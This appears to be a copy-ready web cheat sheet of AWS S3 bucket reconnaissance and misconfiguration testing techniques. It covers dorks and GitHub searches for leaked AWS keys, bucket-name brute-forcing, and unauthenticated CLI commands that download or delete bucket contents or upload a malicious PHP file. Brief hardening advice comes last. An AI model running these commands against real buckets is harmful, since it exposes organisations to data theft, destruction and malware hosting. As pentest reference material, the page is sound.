AWS S3 Buckets
AWS S3 bucket reconnaissance, enumeration, and misconfiguration testing techniques.
16 Categories40+ CommandsCopy Ready
Phase 1
Understanding AWS S3 Buckets
1What is S3 Bucket Reconnaissance?
S3 bucket reconnaissance = identifying publicly accessible or misconfigured AWS S3 buckets2Purpose of S3 reconnaissance
Helps organizations secure their cloud storage by finding exposed data3Test access to a bucket with AWS CLI
AWS CLI: aws s3 ls (requires configured credentials)4Check if bucket exists and is accessible (HTTP headers)
curl -I https://target.s3.amazonaws.comPhase 2
Manual Methods for Identifying S3 Buckets
1Test in browser URL bar - basic bucket URL format
https://target.s3.amazonaws.com2Alternative bucket URL format (older style)
https://s3.amazonaws.com/target3S3 external endpoint format
https://target.s3-external-1.amazonaws.com4Dual-stack endpoint (IPv4 + IPv6)
https://target.s3.dualstack.us-east-1.amazonaws.comPhase 3
Google Dorking for AWS S3 Buckets
1#1 Find S3 buckets related to target domain
site:s3.amazonaws.com "target.com"2#2 Wildcard search for all subdomain buckets
site:*.s3.amazonaws.com "target.com"3#3 Search external S3 endpoints
site:s3-external-1.amazonaws.com "target.com"4#4 Find buckets with directory listing enabled
site:s3.amazonaws.com intitle:"index of"5#5 Search for buckets containing sensitive keywords
site:s3.amazonaws.com "target.com" "bucket" OR "aws_access_key" OR "secret"6#6 Broad search across all Amazon AWS domains
site:amazonaws.com inurl:s3.amazonaws.comPhase 4
Automating Google Dorking with DorkEye
1DorkEye automates Google dorking for faster recon
https://github.com/BullsEye0/dorks-eye2Run DorkEye with target domain and output file
python3 dorkeye.py -d target.com -o s3-results.txt3Filter results for S3 bucket URLs
cat s3-results.txt | grep -i s3.amazonaws.comPhase 5
Using S3Misconfig for Fast Bucket Enumeration
1S3Misconfig scans for buckets with listing enabled
https://github.com/Atharv834/S3BucketMisconf2Scan list of bucket URLs and generate HTML report
python3 s3misconfig.py -l bucket-list.txt -o results.html3Extract open buckets from HTML report
cat results.html | grep -i 'open bucket|listing enabled'Phase 6
Finding S3 Buckets with HTTPX and Nuclei
1#1 Use Subfinder + HTTPX to find S3 in page titles
subfinder -d target.com -all -silent | httpx-toolkit -sc -title | grep -i 'amazon s3|s3.amazonaws'2#2 Scan subdomains with Nuclei S3 detection template
subfinder -d target.com -all -silent | nuclei -t s3-detect.yaml -o s3-nuclei.txt3#3 Filter Nuclei results for S3 findings
cat s3-nuclei.txt | grep -i 's3|bucket'Phase 7
Extracting S3 URLs from JavaScript Files with java2s3
1Katana: Tool to crawl and extract URLs from JS files
https://github.com/projectdiscovery/katana2#1 Crawl target and extract JS file URLs
katana -u https://target.com/ -d 5 -jc | grep '\.js$' | tee alljs.txt3#2 Extract S3 URLs from all JS files
cat alljs.txt | xargs -I {} curl -s {} | grep -oE 'https?://[^\"]*\.s3\.amazonaws\.com[^\"]*' | sort -u4java2s3: Alternative tool for extracting S3 URLs from JS
https://github.com/mexploit30/java2s3Phase 8
Brute-Forcing S3 Bucket Names with LazyS3
1LazyS3: Brute force tool for AWS S3 bucket names
https://github.com/nahamsec/lazys32Basic LazyS3 run with target domain
ruby lazys3.rb target.com3Use custom wordlist with LazyS3
ruby lazys3.rb target.com -w custom-wordlist.txtPhase 9
Using CeWL + S3Scanner to find open buckets
1#1 Generate custom wordlist from target website
cewl https://target.com/ -d 3 -m 5 -w cewl-words.txt2#2 Combine CeWL output with generic wordlist
cat cewl-words.txt rockyou.txt > final-wordlist.txt3S3Scanner: Identify valid/invalid S3 buckets with permission checks
https://github.com/sa7mon/S3Scanner4Scan wordlist and enumerate bucket permissions
s3scanner -bucket-file final-wordlist.txt -enumerate -threads 10Phase 10
Extracting S3 Buckets from GitHub Repositories
1#1 Search GitHub repos for amazonaws references
org:target "amazonaws"2#2 Find exposed AWS access keys in repos
org:target "aws_access_key"3#3 Search for various AWS secret key formats
org:target "aws_secret_key" OR "aws_secret" OR "aws_key"4#4 Find S3 bucket references in code
org:target "S3_BUCKET"Phase 11
Websites for Public S3 Bucket Discovery
1#1 GrayHatWarfare: Search public S3 buckets by keyword
https://buckets.grayhatwarfare.com/2#2 OSINT.sh: Another public S3 bucket search engine
https://osint.sh/buckets/3#3 Nuclei template for S3 detection (reference)
https://github.com/coffinxp/nuclei-templates/blob/main/http/technologies/s3-detect.yamlPhase 13
AWS S3 Bucket Listing & File Management
1#1 List files in bucket (no credentials needed if public)
aws s3 ls s3://bucket-name --no-sign-request2#2 Recursively list all files in human-readable format
aws s3 ls s3://bucket-name --recursive --human-readable --no-sign-request3#3 Filter for potentially sensitive files
aws s3 ls s3://bucket-name --no-sign-request | grep -E '\.(env|pem|key|json|yml|yaml|config|php|ini|sql|db|log|backup|bak|zip|rar|7z|tar|gz)'4#4 Download a specific file from bucket
aws s3 cp s3://bucket-name/file.txt ./ --no-sign-request5#5 Download entire bucket recursively
aws s3 cp s3://bucket-name/ ./ --recursive --no-sign-request6#6 Delete file (if WRITE permission exists - for authorized testing!)
aws s3 rm s3://bucket-name/file.txt --no-sign-requestPhase 14
Exploiting Misconfigured Buckets
1Risk: Data exfiltration, sensitive info disclosure
Public READ = Anyone can list and download files2Risk: Malware hosting, defacement, data poisoning
Public WRITE = Anyone can upload files to bucket3Risk: Complete bucket takeover, data destruction possible
Public FULL_CONTROL = Read + Write + Delete permissions4EXAMPLE: Upload malicious file if WRITE permission exists
aws s3 cp malicious-file.php s3://bucket-name/ --no-sign-requestPhase 15
Securing S3 Buckets
1Use IAM policies to strictly control who can access the bucket
Enable bucket policies and restrict access2Avoid using public-read or public-read-write ACLs
Disable public ACLs unless necessary3Enable logging to detect unauthorized access attempts
Monitor logs using AWS CloudTrail4Use S3 server-side encryption or client-side encryption
Implement encryption for sensitive data5Enable S3 Block Public Access to prevent accidental exposure
Use S3 Block Public Access at account levelTools
Tools & Resources
S3Misconfig Tool
Scans for S3 buckets with listing enabled
DorkEye - Google Dorking
Automates Google dorking for S3 discovery
LazyS3 - Brute Forcer
Brute force S3 bucket names with permutations
java2s3 - JS Extractor
Extract S3 URLs from JavaScript files
S3Scanner
Find open buckets and check permissions
Katana - Crawler
Crawl and extract URLs from JS files
GrayHatWarfare
Public S3 bucket search engine
Nuclei S3 Detect Template
Nuclei template for S3 bucket detection
AWS CLI Documentation
Official AWS CLI S3 command reference